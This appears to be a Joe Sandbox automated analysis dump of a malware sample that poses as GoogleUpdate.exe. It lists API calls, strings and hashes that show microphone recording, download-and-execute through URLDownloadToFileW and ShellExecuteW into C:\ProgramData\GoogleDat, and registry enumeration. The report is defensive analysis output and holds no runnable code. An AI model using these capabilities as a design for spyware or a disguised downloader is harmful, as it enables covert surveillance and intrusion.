                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: MetricsSystem
                                • String ID: ]tA
                                • API String ID: 4116985748-3517819141
                                • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                                • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 0044085A
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                                • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 00440890
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
                                • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405100
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 0040510C
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405117
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405120
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                Strings
                                • Connection KeepAlive | Disabled, xrefs: 004050D9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                • String ID: Connection KeepAlive | Disabled
                                • API String ID: 2993684571-3818284553
                                • Opcode ID: 4a255669a7b4c14ef842559232f525da28a9eda0faf2035cec84cec7ea83ecf5
                                • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
                                • Opcode Fuzzy Hash: 4a255669a7b4c14ef842559232f525da28a9eda0faf2035cec84cec7ea83ecf5
                                • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
                                APIs
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
                                • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
                                • Sleep.KERNEL32(00002710), ref: 00418DBD
                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                • String ID: Alarm triggered
                                • API String ID: 614609389-2816303416
                                • Opcode ID: 5fd2147961172c793483164682d526a6ae8659ed9ea9cff09775d5c3c1313662
                                • Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
                                • Opcode Fuzzy Hash: 5fd2147961172c793483164682d526a6ae8659ed9ea9cff09775d5c3c1313662
                                • Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF
                                APIs
                                • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                                • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                                • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                                • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID: SETTINGS
                                • API String ID: 3473537107-594951305
                                • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                                • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
                                • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
                                • Opcode Fuzzy Hash: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
                                • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
                                APIs
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                • _free.LIBCMT ref: 00442318
                                • _free.LIBCMT ref: 0044232F
                                • _free.LIBCMT ref: 0044234E
                                • _free.LIBCMT ref: 00442369
                                • _free.LIBCMT ref: 00442380
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$AllocateHeap
                                • String ID:
                                • API String ID: 3033488037-0
                                • Opcode ID: bba606fc377604b84075189b83cc930c3fba5f0d417d2f8c667cfcff3c73436f
                                • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
                                • Opcode Fuzzy Hash: bba606fc377604b84075189b83cc930c3fba5f0d417d2f8c667cfcff3c73436f
                                • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
                                • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6), ref: 0044E359
                                • __alloca_probe_16.LIBCMT ref: 0044E391
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?), ref: 0044E3E2
                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?,00000002,00000000), ref: 0044E3F4
                                • __freea.LIBCMT ref: 0044E3FD
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                • String ID:
                                • API String ID: 313313983-0
                                • Opcode ID: 9dc6cc1fdef4dc270a754d83214cf98ce3b1f09711057b0210b2fe42f7f24333
                                • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
                                • Opcode Fuzzy Hash: 9dc6cc1fdef4dc270a754d83214cf98ce3b1f09711057b0210b2fe42f7f24333
                                • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                                • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                                • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
                                • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
                                • waveInStart.WINMM ref: 00401CDE
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                • String ID:
                                • API String ID: 1356121797-0
                                • Opcode ID: 3447fdb9ff269e9e53364b21b500d15ff6263fd99ebe497e903e33a248139b70
                                • Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
                                • Opcode Fuzzy Hash: 3447fdb9ff269e9e53364b21b500d15ff6263fd99ebe497e903e33a248139b70
                                • Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                                • _free.LIBCMT ref: 0044C59F
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: 825181044c3797c199998a294b9de2a6dd0a27ea62f95a6f222d210b691a6f07
                                • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
                                • Opcode Fuzzy Hash: 825181044c3797c199998a294b9de2a6dd0a27ea62f95a6f222d210b691a6f07
                                • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                                • int.LIBCPMT ref: 0040FBE8
                                  • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                  • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                • std::_Facet_Register.LIBCPMT ref: 0040FC28
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                • String ID:
                                • API String ID: 2536120697-0
                                • Opcode ID: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
                                • Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
                                • Opcode Fuzzy Hash: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
                                • Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8
                                APIs
                                • GetLastError.KERNEL32(?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004457AE
                                • _free.LIBCMT ref: 004457E3
                                • _free.LIBCMT ref: 0044580A
                                • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445817
                                • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445820
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                                • Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D
                                APIs
                                • _free.LIBCMT ref: 0044DBB4
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 0044DBC6
                                • _free.LIBCMT ref: 0044DBD8
                                • _free.LIBCMT ref: 0044DBEA
                                • _free.LIBCMT ref: 0044DBFC
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                • Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
                                • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                • Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: DownloadExecuteFileShell
                                • String ID: C:\ProgramData\GoogleDat\GoogleUpdate.exe$open
                                • API String ID: 2825088817-3723853980
                                • Opcode ID: 408c0e2c66d40059f3ccb787a02c8382ad0dc41b5b863402b7e3ab549d603746
                                • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
                                • Opcode Fuzzy Hash: 408c0e2c66d40059f3ccb787a02c8382ad0dc41b5b863402b7e3ab549d603746
                                • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
                                APIs
                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Enum$InfoQueryValue
                                • String ID: [regsplt]
                                • API String ID: 3554306468-4262303796
                                • Opcode ID: 8708e01ee449fd305a71b4056e7db3d63c1d920d9917d504d40d245cf41daf0f
                                • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
                                • Opcode Fuzzy Hash: 8708e01ee449fd305a71b4056e7db3d63c1d920d9917d504d40d245cf41daf0f
                                • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alloca_probe_16__freea
                                • String ID: H"G$H"GH"G
                                • API String ID: 1635606685-3036711414
                                • Opcode ID: 54c5712f20b3b570914cef82e111ba4a5148cfaa71e7a23ac689d4b8bfc24f49
                                • Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
                                • Opcode Fuzzy Hash: 54c5712f20b3b570914cef82e111ba4a5148cfaa71e7a23ac689d4b8bfc24f49
                                • Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E
                                APIs
                                  • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                  • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                  • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
